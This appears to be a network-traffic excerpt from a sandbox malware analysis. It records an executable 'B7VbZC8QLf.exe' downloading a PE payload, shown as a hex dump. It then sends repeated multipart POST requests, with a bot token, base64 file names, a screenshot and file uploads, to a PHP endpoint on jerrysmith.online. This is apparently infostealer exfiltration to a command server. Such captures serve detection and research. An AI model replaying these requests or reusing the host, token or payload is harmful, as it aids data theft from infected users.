00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N@
Mar 22, 2023 11:21:18.779187918 CET	29	IN	Data Raw: 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 Data Ascii: B/81s:<R@B/92P @B
Mar 22, 2023 11:21:18.779638052 CET	31	IN	Data Raw: 26 00 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 Data Ascii: &+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Mar 22, 2023 11:21:18.779673100 CET	32	IN	Data Raw: 04 0f b6 42 14 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 Data Ascii: B]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$
Mar 22, 2023 11:21:18.780205965 CET	34	IN	Data Raw: c7 42 04 00 00 00 00 b0 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 Data Ascii: BLpuBpuBxMMuMZ2Mx]uZxu
Mar 22, 2023 11:21:18.780334949 CET	35	IN	Data Raw: ec 1c 8b 45 08 8b 75 10 8b 7d 0c 8b 58 04 8b 43 1c 89 04 24 e8 33 f5 ff ff 39 73 04 7c 0f 7f 04 39 3b 72 09 89 73 04 89 3b 31 f6 eb 05 be 0b 00 00 00 8b 43 1c 89 04 24 e8 37 f5 ff ff 83 c4 1c 89 f0 5b 5e 5f 5d c3 55 89 e5 53 83 ec 14 8b 45 08 8b Data Ascii: Eu}XC$39s\|9;rs;1C$7[^_]USEXC$MSCQ$1[]U1WVS}U9Wt_C$}~%C$uSE{,uBC,1u~C, {,uC(
Mar 22, 2023 11:21:18.782058954 CET	36	IN	Data Raw: 83 c4 24 5b 5d c3 55 89 e5 53 8d 4d d4 83 ec 30 8b 5a 18 39 58 18 73 15 89 41 10 8b 58 10 85 db 74 06 89 c1 89 d8 eb e8 89 50 10 eb 13 89 51 10 8b 5a 10 85 db 74 06 89 d1 89 da eb d3 89 42 10 8b 45 e4 83 c4 30 5b 5d c3 55 89 e5 56 53 89 c6 83 ec Data Ascii: $[]USM0Z9XsAXtPQZtBE0[]UVS01tB@ td\$\$$T$[^]HPUJHQP@J,]UE]@0U1WVMSEu]y4A89tBV1
Mar 22, 2023 11:21:18.782094002 CET	38	IN	Data Raw: 0e 66 83 78 28 00 78 07 8b 40 48 85 c0 75 58 8b 43 40 83 38 00 74 4c 8d 55 e0 c7 45 e0 00 00 00 00 c7 45 e4 00 00 00 00 e8 18 e9 ff ff 85 c0 75 4b 8b b3 a8 00 00 00 8b bb ac 00 00 00 89 f0 03 45 e0 89 fa 13 55 e4 89 74 24 08 89 7c 24 0c 83 c0 ff Data Ascii: fx(x@HuXC@8tLUEEuKEUt$\|$$T$1;vM1<[^_]Uxxuty+tP@]US@@<$C[]UE]fa1UWVSSxMtDp;FPt
Mar 22, 2023 11:21:18.782133102 CET	39	IN	Data Raw: 83 c4 1c 5b 5e 5f 5d c3 8b 45 ec 83 c4 1c 5b 5e 5f 5d e9 e0 fc ff ff 55 89 e5 57 56 8b 7d 08 53 0f b6 4f 0a 03 4d 0c 0f b6 01 83 f8 7f 76 1b 8d 71 08 83 e0 7f 41 8a 19 c1 e0 07 89 da 83 e2 7f 09 d0 39 ce 76 04 84 db 78 eb 0f b7 77 0e 41 39 f0 77 Data Ascii: [^_]E[^_]UWV}SOMvqA9vxwA9w+MF$W4_z(1)9B+MD[^_]UUBJ@xy9w)]UWVSQ]Uv{FEE9vx~NyC~Ny:~
Mar 22, 2023 11:21:18.782159090 CET	40	IN	Data Raw: d1 e8 eb 07 0f b6 80 60 98 ec 61 5d c3 55 89 e5 57 56 89 c7 89 d6 83 ec 08 83 fa 0b 0f 87 07 01 00 00 ff 24 95 54 70 eb 61 66 c7 41 10 01 04 c7 41 0c 00 00 00 00 c7 01 00 00 00 00 e9 02 01 00 00 66 c7 41 10 01 00 e9 f7 00 00 00 0f be 00 eb 0c 0f Data Ascii: `a]UWV$TpafAAfAWQfAfW@GW7W@11E}EUQw
Mar 22, 2023 11:21:18.806018114 CET	42	IN	Data Raw: e5 8b 45 08 ff 40 10 31 c0 5d c3 55 89 e5 8b 45 08 ff 48 10 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 8b 45 0c 80 38 a8 75 09 8b 55 08 8b 52 18 00 50 02 31 c0 5d c3 55 0f bf 50 20 8b 40 2c 89 e5 f6 40 1c 60 74 36 89 d1 c1 e1 04 03 48 04 f6 41 0e 60 74 Data Ascii: E@1]UEH]U1]UE8uURP1]UP @,@`t6HA`t(fH"f?511 ??N11 ]Ut@ t@]Ut P tt@@@]UuHuB

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.5	49730	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:29.478586912 CET	1291	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECG Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:29.478645086 CET	1292	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
Mar 22, 2023 11:21:29.622883081 CET	1293	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.5	49731	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:29.785685062 CET	1293	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEH Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:29.785753012 CET	1295	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
Mar 22, 2023 11:21:29.935949087 CET	1295	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.5	49732	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:30.051476955 CET	1296	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAF Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:30.051542044 CET	1298	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
Mar 22, 2023 11:21:30.203032017 CET	1298	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.5	49733	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:31.458725929 CET	1299	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH Host: jerrysmith.online Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:31.458791018 CET	1300	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
Mar 22, 2023 11:21:31.606739044 CET	1301	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.5	49734	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:33.942826033 CET	1302	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ Host: jerrysmith.online Content-Length: 135179 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:33.942974091 CET	1313	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="file_name"c2NyZWVuc2hvd
Mar 22, 2023 11:21:33.969619036 CET	1315	OUT	Data Raw: 32 67 41 52 74 38 63 72 58 76 6d 49 41 32 4f 47 38 76 6e 63 44 77 65 2b 61 34 77 34 50 61 6b 77 50 51 55 53 6f 63 7a 76 66 2b 72 57 48 47 71 30 6b 72 62 66 35 33 4e 6e 78 4e 71 6b 57 73 61 78 46 66 52 7a 47 65 53 53 79 74 68 63 79 6c 53 43 30 34 Data Ascii: 2gARt8crXvmIA2OG8vncDwe+a4w4PakwPQUSoczvf+rWHGq0krbf53NnxNqkWsaxFfRzGeSSythcylSC04iUSE5HJ3A5PfrUPh+7g0/xPpF7dP5dvb3sMsr4J2qrgk4HJ4Has2lrRRsrGcnzM6SbxTFb+G9JtNNt7VtQis7m3lvHSTzbcSTSEqmWCfMjddpI3HkHptP4v0ie40B5piG0CC0mtnVHCzMkcYmgYAcPlPlfGOME4wR
Mar 22, 2023 11:21:33.969667912 CET	1320	OUT	Data Raw: 6d 6a 4d 6a 79 42 6b 4d 61 75 64 77 4c 6b 45 45 41 64 43 44 31 78 68 59 48 70 51 56 42 37 56 6c 48 44 70 62 66 31 2f 57 78 6f 36 7a 65 2f 39 66 31 75 62 37 6e 53 4e 63 30 72 54 59 70 74 59 69 30 36 35 30 32 4e 37 62 46 33 42 4b 55 6d 69 4d 6a 75 Data Ascii: mjMjyBkMaudwLkEEAdCD1xhYHpQVB7VlHDpbf1/Wxo6ze/9f1ub7nSNc0rTYptYi06502N7bF3BKUmiMjurqY1fDfOQVOB0wTzjU0rxD4Y0qLRbOS3v72KPzXvJorgQx/v/AN26tGYmLbYwvRhznB71xm0egpdo9Kp0b6N6E+16o7aPxNo9pbaNBHdvMxmFpqjiJwGtYxJEjDpndFKeMZ+QZrF1KTR9X8QXtw2qm0tFuYLW1zbO
Mar 22, 2023 11:21:33.969692945 CET	1323	OUT	Data Raw: 41 45 6c 76 5a 78 32 30 45 6b 4b 46 69 73 6a 75 35 33 48 6e 4c 45 6b 2f 77 41 36 70 51 36 47 74 76 45 36 52 33 31 30 43 30 61 78 42 69 49 7a 74 52 63 34 55 41 70 6a 75 52 79 44 56 6e 37 62 50 2f 30 44 4c 76 38 41 37 36 69 2f 2b 4c 6f 2b 32 7a 2f Data Ascii: AElvZx20EkKFisju53HnLEk/wA6pQ6GtvE6R310C0axBiIztRc4UApjuRyDVn7bP/0DLv8A76i/+Lo+2z/9Ay7/AO+ov/i6AK6aDaogjEkvlG3+zPHlcOvOM8ZB+Y9MVbtbWS2iZHvbi4yMK0oTK/Taoz+OaZ9tn/6Bl3/31F/8XR9tn/6Bl3/31F/8XQBDBosMMqzNPNLKJ/PLsEBZtpXkKoHQ+mfeg6LECrQ3NxBKryMJIyuc
Mar 22, 2023 11:21:33.969717026 CET	1325	OUT	Data Raw: 71 73 53 4e 6f 70 32 4b 4d 55 41 4a 53 55 37 46 47 4b 41 47 34 6f 78 54 73 55 45 59 6f 41 62 52 69 6c 6f 6f 43 34 33 47 4b 55 55 74 46 46 67 45 78 52 54 73 55 6c 41 58 45 6f 78 53 30 6d 4b 51 42 69 6a 46 4b 52 53 59 6f 41 4d 55 6d 4b 64 53 64 36 Data Ascii: qsSNop2KMUAJSU7FGKAG4oxTsUEYoAbRilooC43GKUUtFFgExRTsUlAXEoxS0mKQBijFKRSYoAMUmKdSd6AEIpuKkpMUWHcjIpMVJikxSHcZikxTiKSlYYmKSnUhFIYlIRTsUlIY2jFOpMUBcbRTsUmKVh3EoxRijFFgCgCil7UAIaSnUhFAxKKKXtSATFFFLzRYBKWiimgEopaMUgDmjmjmimAlFKaKVgEopaKAuR16d8Cc/8A
Mar 22, 2023 11:21:33.969789028 CET	1328	OUT	Data Raw: 54 69 4b 53 70 47 4e 37 30 76 4e 47 4b 4b 42 68 51 4b 44 53 30 43 43 69 6c 70 4b 41 45 6f 41 70 63 55 75 4b 41 47 34 6f 4e 4c 53 30 37 42 63 53 69 6c 70 4b 41 75 52 55 2b 47 4b 53 34 6d 6a 68 68 51 76 4c 49 77 52 46 48 55 6b 6e 41 46 4e 72 58 69 Data Ascii: TiKSpGN70vNGKKBhQKDS0CCilpKAEoApcUuKAG4oNLS07BcSilpKAuRU+GKS4mjhhQvLIwRFHUknAFNrXi8L6tcaSupRW8LW7wvOi/aovNaNCQ7CLdvIBU5IXsTWbaSuy0m9Edbr1paXWjalotvrdjdNoiRPb28Ec29BH8lySWjCHJYv8rH7tMbQLOHxZDZTeGSNESO5e3vjJP/AMTFUt3dH8zdsOcBvkAxnFeeeWhHTik8pMdO
Mar 22, 2023 11:21:33.969825983 CET	1330	OUT	Data Raw: 47 63 2b 57 71 37 5a 64 77 41 77 58 50 79 34 34 46 41 48 64 4a 66 32 63 71 32 37 52 33 63 44 72 63 2f 36 67 72 49 43 4a 65 4d 2f 4c 2f 65 34 42 50 48 70 55 59 31 66 54 54 71 54 36 63 4e 52 74 44 66 52 70 35 6a 32 33 6e 4c 35 71 72 36 6c 63 35 41 Data Ascii: Gc+Wq7ZdwAwXPy44FAHdJf2cq27R3cDrc/6grICJeM/L/e4BPHpUY1fTTqT6cNRtDfRp5j23nL5qr6lc5A5HOO9c74YtkuNZv722uIrjSreSSPT3jIZcyEPNhu4D/KMdMEdqbqXhrVNQu9Zt4ZYbHTdRt5UkK3LTGWVkCq5jKDy8Ac7Xwe4ycgAv3Pjnw1b/YT/AG1YSx3lwbdJYrqNkVgu47ju4A4H1ZfWnaX4t0zW1R9MvLKV
Mar 22, 2023 11:21:33.969861984 CET	1336	OUT	Data Raw: 69 6e 41 55 45 55 57 41 5a 69 69 6e 59 70 4b 51 37 6a 43 4b 4d 55 37 46 4a 69 6b 4f 34 33 46 47 4b 63 52 53 64 36 41 45 78 53 30 74 47 4b 41 45 6f 78 51 4b 4f 39 41 42 53 59 70 32 4b 43 4b 41 47 34 6f 32 30 34 43 67 6a 46 41 45 4e 4c 51 4b 30 64 Data Ascii: inAUEUWAZiinYpKQ7jCKMU7FJikO43FGKcRSd6AExS0tGKAEoxQKO9ABSYp2KCKAG4o204CgjFAENLQK0dIsYtQu3ilZ1URlvkIznIH9aIU3OSiuo5zUIuT2Rniiuq/4Rqz/wCes/8A30P8KP8AhGrP/nrP/wB9D/Cur6hWOP8AtCictRXU/wDCNWf/AD0n/wC+h/hR/wAI1Z/89J/++h/hT+o1hfX6JyuKMV1X/CNWf/PWf/vo
Mar 22, 2023 11:21:33.969892979 CET	1338	OUT	Data Raw: 62 2f 6f 7a 61 6a 47 63 33 37 71 75 65 68 2f 44 77 72 6f 48 68 79 7a 4f 6f 54 73 68 31 65 37 78 61 78 6e 2b 48 35 63 41 2f 6a 6a 39 56 39 61 38 71 38 52 36 5a 63 36 52 34 67 76 62 4b 36 5a 6e 6c 6a 6c 4a 38 78 75 72 67 38 68 76 78 42 7a 57 76 34 Data Ascii: b/ozajGc37queh/DwroHhyzOoTsh1e7xaxn+H5cA/jj9V9a8q8R6Zc6R4gvbK6ZnljlJ8xurg8hvxBzWv4ou/EqS6d/bUZtmtl/0VVVV2gY5AH0H5VneI/El34muobm+htknjTy98KFS4zkZyT05/OvAb0sd1SaceTax1XwseIatbodfnhlM0hGlLG5jnHlffLA7QfqM/IParujXFm2uaeF+JGo3bG5jAtnt7gCY7h8hJbAB6c8
Mar 22, 2023 11:21:33.996624947 CET	1343	OUT	Data Raw: 2b 46 39 4b 30 71 37 31 55 58 65 75 58 48 32 54 54 4a 34 37 53 61 61 4f 77 44 4f 30 37 37 69 41 71 47 55 66 4b 46 51 6b 73 53 4f 65 41 44 31 71 4b 38 38 4a 72 5a 57 65 6f 75 62 32 53 36 75 62 4f 34 61 45 78 57 64 75 4a 46 56 52 74 32 79 53 6b 75 Data Ascii: +F9K0q71UXeuXH2TTJ47SaaOwDO077iAqGUfKFQksSOeAD1qK88JrZWeoub2S6ubO4aExWduJFVRt2ySkuGjVt3B2kZGM5rNi8Q6zFf3179qhlmvnElys9rFLHI4OQxjdSuQScEDIycdaiOs6obW8gM8RN6zNcTm2jM8m4gsDLt34JHIDY6+tNKt1/rb/gk3pHU6d4S0lPE8FnNqct19i1SCy1KD7HtUs7FcI3mfMu5SpJCkA5A
Mar 22, 2023 11:21:34.253658056 CET	1542	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.5	49739	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:35.330427885 CET	1564	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC Host: jerrysmith.online Content-Length: 266 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 61 33 34 37 64 32 66 31 34 64 31 38 66 35 39 62 66 64 33 31 37 63 35 35 33 63 38 38 38 65 64 65 39 35 33 32 61 38 65 35 63 64 61 63 35 32 30 30 30 31 34 36 31 37 30 36 35 61 30 63 65 38 64 39 64 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 69 73 64 6f 6e 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="message"isdone------EGDGIIJJECFIDHJJKKFC--
Mar 22, 2023 11:21:35.472712040 CET	1564	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49695	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:21.480331898 CET	1198	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAK Host: jerrysmith.online Content-Length: 355 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 61 33 34 37 64 32 66 31 34 64 31 38 66 35 39 62 66 64 33 31 37 63 35 35 33 63 38 38 38 65 64 65 39 35 33 32 61 38 65 35 63 64 61 63 35 32 30 30 30 31 34 36 31 37 30 36 35 61 30 63 65 38 64 39 64 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 47 39 6a 61 57 45 75 5a 47 39 6a 65 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 2d 2d 0d 0a Data Ascii: ------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="file_name"ZG9jaWEuZG9jeA==------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="file"------AAFIDGCFHIEHJJJJECAK--
Mar 22, 2023 11:21:21.625881910 CET	1198	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49696	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
